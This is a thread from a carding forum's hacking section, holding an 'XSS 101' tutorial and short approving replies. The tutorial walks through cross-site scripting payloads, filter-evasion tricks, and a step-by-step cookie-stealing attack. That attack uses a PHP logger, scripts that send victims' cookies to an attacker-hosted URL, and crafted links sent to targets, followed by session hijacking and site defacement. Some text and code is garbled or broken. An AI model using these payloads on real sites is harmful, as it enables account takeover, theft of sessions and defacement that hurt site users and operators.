Go Back   Carding Forum ¤ (carding forum, card fraud, carding board, darknet forum, darknet markets, credit card fraud, fraud, atm fraud, cvv shop, atm skimmers, emv chip dumps, dumps shop, credit cards cvv, credit cards cvv2, dumps, dumps with pin, cvv2, buy dumps, buy credit cards, dumps with pin for sale, fresh stuff, dumps 101, dumps 201, dumps+pin, buy dumps with pin) > English-speaking carders > Hacking & Coding > Articles
Members List Search Today's Posts Mark Forums Read

Thread Tools
Old 27-07-2011, 01:34 PM   #1
Join Date: Jul 2011
Posts: 34
Reputation: 9
Default XSS 101

Title:XSS 101

I. What is XSS?
Cross-site scripting (XSS), it should have been CSS but that name is abitcoineady taken by Cascade-Style Sheets so it became XSS, is a type of computer security vulnerability typically found in web abtclications that enables attackers to inject client-side script into web pages viewed by other users. A cross-site scripting vulnerability may be used by attackers to bypass access controls, steal cookies or other types of malicious activities. They are very common nowadays. - Wikipedia (http://en.wikipedia.org/wiki/Cross-site_scripting)

II. XSS'ing

1. How to test for XSS?
The easiest way to find an XSS flaw is to find a text input field on website/abtclication you currently are viewing. Very common XSS injection locations are username, signature or other contact fields and/or the search field.

Once you select a field you can input a test cross-site scripting injection. Enter <script>alert(1337)</script> or "><script>alert(1337)</script> (bypasses some protections) in the select form or field (search one for e.g.). It should return a popup alert containing the number 1337. Some websites might have protection measures so you can use various obfuscation methods to bypass the restrictions, a very good resource is the XSS cheat sheet - http://ha.ckers.org/xss.html

2. Filter Evasion
Sometimes your forms would be patched in some way (will have restrictions on characters, specific inputs etc.) but most of the time they do poor quality protections.

Scenario 1: If it returns a blank/empty reflection or an "Invalid Input" error then the website is most likely blocking the keywords <script> and </script>. You can bypass this filter simply by changing the case of the script tag. For example, <SCRIPT>alert(1337)</SCRIPT> or <ScripT>alert(1337)</ScripT>.

Scenario 2: If it returns your script with quotes around it ("<script>alert(1337)</script>") then you can attempt to close the quotes before you start the script. You can do this by adding "> before the script. For example, "><script>alert(1337)</alert> (as shown above). Quotes are "negative" factors because when placed around the script they convert the script to plain text and don't allow it to function.

Scenario 3: If it returns your script without the <script> tag(only alert(1337)) then it is only removing the tags and not considering the whole input invalid. To bypass this just add another tag around the <script> tag. For example, <sc<script>ript>alert(1337)</sc</script>ript>. The filter will automatically remove the tag covering your input, therefore only <script>alert(1337)</script> will remain.

Scenario 4: If the website simply won't allow you to post the script tags or the alert you can attempt to encode your script into hex. You can do this by using Xlate or any other free ASCII to hex converter. Once you get the hex version of the script you can enter it in just as you would do with the ASCII version of the script and it will have the same outcome.

3. MaxLength limitations
In many cases input fields will have a limit to the amount of characters that can be entered and sometimes your script will exceed that limit. There are a few methods that can be used to bypass this:

Method 1: On some websites you will be able to increase the maximum amount of characters allowed. To change the MaxLength perform the following steps:
1. Right click on the input field
2. Click 'inspect element'
3. Find the line which holds <input id="query" type="text" maxlength="10" size="13" name="search_term" class="input_text"> and increase the number after maxlength=".
4. Submit the form. If it returns an error stating that the information entered in the form was faulty then the website is not vulnerable to this.

Method 2: Upload the script to your server and enter it to use as the source. There are two ways to do this:
1. <img src='http://urfreehosting./wootscript.js'></img>
2. <script src='http://urfreehosting.com/wootscript.js'></script>

4. Attack Vectors
There are two main types of XSS vulnerabilities, reflected and persistent. A reflected XSS is one in which you fill out an input field of something like a search bar, email subscription field, or anything else that won't permanently remain on the website and will disabtcear as soon as you leave the page. These will take effect with the help of Social Engineering. A persistent XSS vulnerability is used in locations on a website such as a comment field, public profile information or anything else that will remain on-site and visible to other people.

If you find a persistent XSS on a website you will be able to run any script that you want which includes having the ability to deface that certain page(which I assume that the majority of you reading this want).
If you find a reflective XSS you'll be able to run scripts on the site like cookie stealing and CSRF but it will require some social engineering. I consider cookie stealing very useful and will explain why further on in this tutorial but I will also show you how to deface a website via a persistent XSS vulnerability.

Cookie Stealing
1. Find a vulnerable XSSi location on the website. We'll use Site.com/search.word?=(Script Here).

2. Upload your cookie to a web server. You can use a paid web host like Go Daddy and Host Gator or a free one like t35.com, x10hosting.com or any other.

3. Open notepad and paste the following:
PHP Code:
PHP Code:
$log fopen("log.txt""a");
fwrite($log$cookie ."\n");
Save it however you like but it must be with a .php extension for example l0gg3r.php.

4. Upload l0gg3r.php to the root folder of your web server.

5. Add a file named log.txt to the root folder as well.

6. Add the following script to your XSS injectable URL (replace urfreesitehosting.com/l0gg3r.php with your site/l0gg3r.php).
<script>document.location="http://www.urfreesitehosting.com/l0gg3r.php?cookie=" + document.cookie;</script>
If you want to make this less noticeable then you can use another script that redirects them back to the ictim site after they visit your cookie logger:
<script language= "JavaScript">document.location="http://urfreesitehosting.com/l0gg3r.php?cookie=" + document.cookie;document.location="http://www.victimexample.net"</script>
7. Send your target the XSS injected link. For example, ours would be
victimexample.net/search.php?word=<script>document.location="http://www.urfreesitehosting.com/l0gg3r.php?cookie=" + document.cookie;</script>
If you don't want your target to see the script you can encode it into hex just like Scenario 4 of Filter Evasion. Only encode the script (everything after victimexample.net/search?word= ).

8. You have successfully logged their cookies! Site.com has sent them to your logger and you now have their site.com cookies. Now gather their PHPSESSID or any other session ID cookie that you've logged.

9. Download the add-on "Edit This Cookie" for Google Chrome and Mozilla Firefox.

10. Go to edit this cookie and replace your session ID with their's. Now click 'Submit Cookie Changes'. You should now be logged in to the admin's/target's account. You can now do anything that doesn't require you to enter their password from making a post or sending a Private Message to (if you're on an administrator account) deleting threads, maybe defacing the website, or banning members.

5. Defacing or how to be a douchebag skid
Find a persistent XSS and enter the following script:
Now the page will redirect to your deface and this of course is most-likely to work on guestbooks and other useless websites.

III. Future improvements
I wrote this guide a lot of time ago and I finally to improve and add content especially for carder.ws . It will be updated and more interesting attacks will be added. If you have any suggestions/feedback/criticism please leave a comment.
KNS is offline Add Infraction for KNS   Reply With Quote
Old 24-07-2012, 08:21 AM   #2
Join Date: Jul 2012
Posts: 80
Reputation: 5

Nice this
developer is offline Add Infraction for developer   Reply With Quote
Old 06-10-2012, 03:10 AM   #3
Join Date: Sep 2012
Location: Information
Posts: 27
Reputation: -1

xss yes bro thanx
destractions is offline Add Infraction for destractions   Reply With Quote
Old 20-10-2012, 06:16 AM   #4
Join Date: Oct 2012
Posts: 20
Reputation: -1
Send a message via ICQ to 2012CarderPro

vulnerability anything.
2012CarderPro is offline Add Infraction for 2012CarderPro   Reply With Quote


xss cross-site scripting

Currently Active Users Viewing This Thread: 1 (0 members and 1 guests)
Thread Tools

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is On
HTML code is Off

Forum Jump

All times are GMT -5. The time now is 12:04 AM.